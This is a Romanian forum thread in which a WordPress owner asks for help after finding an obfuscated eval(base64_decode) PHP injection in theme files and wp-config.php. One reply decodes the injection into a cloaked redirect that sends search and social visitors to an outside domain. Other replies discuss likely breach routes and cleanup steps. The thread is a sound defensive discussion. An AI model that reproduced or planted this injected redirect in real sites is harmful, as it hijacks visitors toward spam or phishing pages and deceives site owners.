un pic de ajutor

[soryn4u]

un hacker imi insereaza in paginile php de pe site-uri urmatorul code..

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9naWdvcC5hbWVyaWNhbnVuZmluaXNoZWQuY29tLyIpOw0KZXhpdCgpOw0KfQp9DQp9DQp9DQp9")); ?>


aveti idee cum poate insera acest code in paginile php?
[code][/code]

[quadmachine]

Cum se poate? Pai acces la CPanel prin bruteforce si apoi a folosit filemanager sau a urcat un shell pe host printr-un exploit.

Ce scrie in cod?

Cod: Selectaţi tot

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://gigop.americanunfinished.com/");
exit();
}
}
}
}
}

[soryn4u]

stiu am decodificat si eu code-ul... insa treaba e destul de serioasa... pentru ca ...
vad ca toti mai multi care detin un blog wordpress patesc asta....
eu foloseam wordpress...si mi-am gasit toata tema infectata cu acest code.....
am dezinfectat tema....mi-am pus cateva plugin-uri de securitate....
am schimbat .htaccess .... acum cateva zile in urma....
si azi ..tema..nu a fost infectata ..
in schimb m-am trezit doar cu fisierul wp-config.php infectat cu acest code...
acum am mai pus un code in .htaccess pentru protectia wp-config.php ...
acum sa vad ce se mai intampla... pentru ca totul este facut automat de aces hacker ...
ia site-urile la intamplare...si le ataca !

[mihaitha]

Hacker-ul ar putea avea acces la parola ta de FTP. Daca cumva folosesti Filezilla, ar trebui sa te intereseze faptul ca are o bresa de securitate imensa (toate host-urile salvate sunt tinute intr-un XML, plaintext - inclusiv parolele). Vezi articolul asta ca sa iti rezolvi problema:
http://mydigitalfixation.com/safer-way-to-ftp

Daca nu folosesti Filezilla, incearca sa iti schimbi parola de FTP, vezi daca mai apare virusul.

[marianmp]

stiu am decodificat si eu code-ul... insa treaba e destul de serioasa... pentru ca ...
vad ca toti mai multi care detin un blog wordpress patesc asta....
eu foloseam wordpress...si mi-am gasit toata tema infectata cu acest code.....
am dezinfectat tema....mi-am pus cateva plugin-uri de securitate....
am schimbat .htaccess .... acum cateva zile in urma....
si azi ..tema..nu a fost infectata ..
in schimb m-am trezit doar cu fisierul wp-config.php infectat cu acest code...
acum am mai pus un code in .htaccess pentru protectia wp-config.php ...
acum sa vad ce se mai intampla... pentru ca totul este facut automat de aces hacker ...
ia site-urile la intamplare...si le ataca !

wp are problemele lui dar asta nu e de la el sunt sigur.

Sunt aproape sigur ca ai un host shared de proasta calitate, ai inregistrat domeniul hostul pe e-mailul pe care vorbesti zilnic ba mai mult este yahoo.

Sfatul meu dezinfecteaza computerul, simba toate parolele la toate conturile reinstaleaza wp

[MihaiA]

Sincer nu vreau sa fiu rau dar este adevarat ca tot mai multe bloguri bazate pe wordpress au fost sparte si folosite la phising,spam, etc.(si linkul este din tema site.com/wp-content/themes/xxx/script_infectat.html)